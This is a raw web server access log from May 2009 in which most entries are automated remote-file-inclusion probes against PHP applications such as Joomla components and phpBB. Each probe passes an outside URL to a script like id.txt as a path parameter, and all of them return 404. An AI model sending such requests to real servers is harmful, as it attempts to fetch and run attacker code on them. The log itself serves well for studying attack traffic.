211.241.40.51 - - [17/May/2009:05:03:25 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:03:25 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:03:25 -0400] "GET /logs/access_log.Q108100900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
123.125.64.38 - - [17/May/2009:05:03:33 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
221.157.225.65 - - [17/May/2009:05:04:36 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
221.157.225.65 - - [17/May/2009:05:04:36 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.187.131.186 - - [17/May/2009:05:05:03 -0400] "GET //modules/rg4_board/list.php?bbs_code=admin=http://208.98.22.241/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:05:05:03 -0400] "GET /logs//modules/rg4_board/list.php?bbs_code=admin=http://208.98.22.241/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:05:05:03 -0400] "GET /logs/access_log.Q109020600//modules/rg4_board/list.php?bbs_code=admin=http://208.98.22.241/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
122.153.212.195 - - [17/May/2009:05:05:04 -0400] "GET /logs/access_log.Q108100900%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:05:05:04 -0400] "GET /logs/access_log.Q108082900%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
221.157.225.65 - - [17/May/2009:05:05:13 -0400] "GET /logs/access_log.Q108100700//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:06:01 -0400] "GET /logs/access_log.Q108122100//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:06:01 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:06:01 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:06:03 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:06:03 -0400] "GET /logs/access_log.Q108122100//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:06:03 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:06:06 -0400] "GET /logs/access_log.Q108091400//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:06:09 -0400] "GET /logs/access_log.Q108091400//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:05:06:09 -0400] "GET /logs/access_log.Q107070900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.149.235.45 - - [17/May/2009:05:06:35 -0400] "GET /logs/access_log.Q108100900//skin/zero_vote/ask_password.php?dir=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.810"
89.149.235.45 - - [17/May/2009:05:06:35 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
89.149.235.45 - - [17/May/2009:05:06:35 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
218.150.79.146 - - [17/May/2009:05:06:51 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:06:51 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:06:51 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:06:53 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:06:53 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:06:53 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.50.163.164 - - [17/May/2009:05:06:56 -0400] "GET /logs/access_log.Q109020600//modules/rg4_board/list.php?bbs_code=admin=http://208.98.22.241/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
116.50.163.164 - - [17/May/2009:05:06:56 -0400] "GET //modules/rg4_board/list.php?bbs_code=admin=http://208.98.22.241/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
116.50.163.164 - - [17/May/2009:05:06:56 -0400] "GET /logs//modules/rg4_board/list.php?bbs_code=admin=http://208.98.22.241/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
218.150.79.146 - - [17/May/2009:05:07:16 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:07:23 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:08:40 -0400] "GET /logs/access_log.Q108100600/components/com_performs/performs.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:05:09:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.241.40.51 - - [17/May/2009:05:09:50 -0400] "GET /logs/access_log.Q108082900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:09:54 -0400] "GET /logs/access_log.Q108091400%20%20//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:09:59 -0400] "GET /logs/access_log.Q108100600/components/com_performs/performs.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:05:10:10 -0400] "GET /logs/access_log.Q108091400%20%20//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:10:10 -0400] "GET /logs/access_log.Q108100900%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:10:56 -0400] "GET /logs/access_log.Q108090200%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
83.103.72.130 - - [17/May/2009:05:13:05 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
89.149.235.45 - - [17/May/2009:05:13:09 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
209.59.12.99 - - [17/May/2009:05:14:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.241.40.51 - - [17/May/2009:05:15:46 -0400] "GET /logs/access_log.Q108100900%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:16:20 -0400] "GET /logs/access_log.Q108090200%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:17:19 -0400] "GET /logs/access_log.Q108082400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:17:19 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:17:19 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:17:20 -0400] "GET /logs/access_log.Q108082000//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:17:20 -0400] "GET /logs/access_log.Q108122500//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:17:20 -0400] "GET //include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:17:20 -0400] "GET /logs//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:17:40 -0400] "GET //include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:17:41 -0400] "GET /logs/access_log.Q108082000//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:17:41 -0400] "GET /logs//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:17:41 -0400] "GET /logs/access_log.Q108122500//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:05:18:19 -0400] "GET //include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:05:18:19 -0400] "GET /logs//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:05:18:19 -0400] "GET /logs/access_log.Q108082000//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:05:18:19 -0400] "GET /logs/access_log.Q108122500//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:05:19:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.212.167.26 - - [17/May/2009:05:19:32 -0400] "GET /logs/access_log.Q108082000%20%20//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:19:32 -0400] "GET /logs/access_log.Q108122500%20%20//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:19:49 -0400] "GET /logs/access_log.Q108082000%20%20//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:19:49 -0400] "GET /logs/access_log.Q108122500%20%20//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:05:20:19 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
72.3.226.56 - - [17/May/2009:05:20:19 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
72.3.226.56 - - [17/May/2009:05:20:19 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
72.3.226.56 - - [17/May/2009:05:20:24 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.5.168.93 - - [17/May/2009:05:20:36 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.5.168.93 - - [17/May/2009:05:20:37 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
195.5.168.93 - - [17/May/2009:05:20:58 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.5.168.93 - - [17/May/2009:05:20:58 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:05:21:04 -0400] "GET /logs/access_log.Q108082000%20%20//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:05:21:04 -0400] "GET /logs/access_log.Q108122500%20%20//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
82.159.191.105 - - [17/May/2009:05:22:06 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
82.159.191.105 - - [17/May/2009:05:22:13 -0400] "GET /logs/access_log.Q108111500%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
82.159.191.105 - - [17/May/2009:05:22:13 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
82.159.191.105 - - [17/May/2009:05:22:17 -0400] "GET /logs/access_log.Q108110900%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:05:22:30 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:05:22:30 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:05:22:30 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:05:22:56 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:05:24:01 -0400] "GET /logs/error_log.Q108102500%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
209.59.12.99 - - [17/May/2009:05:24:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.59.178 - - [17/May/2009:05:24:29 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:05:24:40 -0400] "GET /logs/access_log.Q109051000%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:05:24:50 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
110.45.145.92 - - [17/May/2009:05:24:50 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
110.45.145.92 - - [17/May/2009:05:24:50 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
110.45.145.92 - - [17/May/2009:05:26:02 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
216.129.119.47 - - [17/May/2009:05:26:31 -0400] "GET /logs/access_log.Q109032500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.212.167.26 - - [17/May/2009:05:27:24 -0400] "GET /logs/access_log.Q108082800//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:27:31 -0400] "GET /logs/access_log.Q108082800//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.15.206.26 - - [17/May/2009:05:27:33 -0400] "GET /logs/access_log.Q108100600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
67.15.206.26 - - [17/May/2009:05:27:33 -0400] "GET /logs/access_log.Q108100600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
67.15.206.26 - - [17/May/2009:05:27:33 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.65"
67.15.206.26 - - [17/May/2009:05:27:33 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.65"
67.15.206.26 - - [17/May/2009:05:27:34 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
67.15.206.26 - - [17/May/2009:05:27:34 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
87.106.163.214 - - [17/May/2009:05:27:36 -0400] "GET /logs/access_log.Q108100600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
87.106.163.214 - - [17/May/2009:05:27:36 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
87.106.163.214 - - [17/May/2009:05:27:37 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
67.15.206.26 - - [17/May/2009:05:28:05 -0400] "GET /logs/access_log.Q108082900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
67.15.206.26 - - [17/May/2009:05:28:05 -0400] "GET /logs/access_log.Q108082900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
87.106.163.214 - - [17/May/2009:05:28:06 -0400] "GET /logs/access_log.Q108082900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
212.158.163.65 - - [17/May/2009:05:28:14 -0400] "GET /logs/access_log.Q108100600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:05:28:14 -0400] "GET /logs/access_log.Q108100600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:05:28:14 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:05:28:14 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:05:28:14 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:05:28:14 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:05:28:45 -0400] "GET /logs/access_log.Q108082900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:05:28:45 -0400] "GET /logs/access_log.Q108082900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
209.59.12.99 - - [17/May/2009:05:29:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.212.167.26 - - [17/May/2009:05:29:22 -0400] "GET //include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:29:22 -0400] "GET /logs//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:29:22 -0400] "GET /logs/access_log.Q108082000//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:29:22 -0400] "GET /logs/access_log.Q108122500//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.2 - - [17/May/2009:05:29:40 -0400] "GET /logs/inc/claro_init_header.inc.php?includePath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:05:29:40 -0400] "GET /inc/claro_init_header.inc.php?includePath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:05:29:40 -0400] "GET /logs/access_log.Q108100600/inc/claro_init_header.inc.php?includePath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:05:29:47 -0400] "GET /logs//inc/claro_init_header.inc.php?includePath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:05:29:47 -0400] "GET /logs/access_log.Q108100600//inc/claro_init_header.inc.php?includePath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:05:29:47 -0400] "GET //inc/claro_init_header.inc.php?includePath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
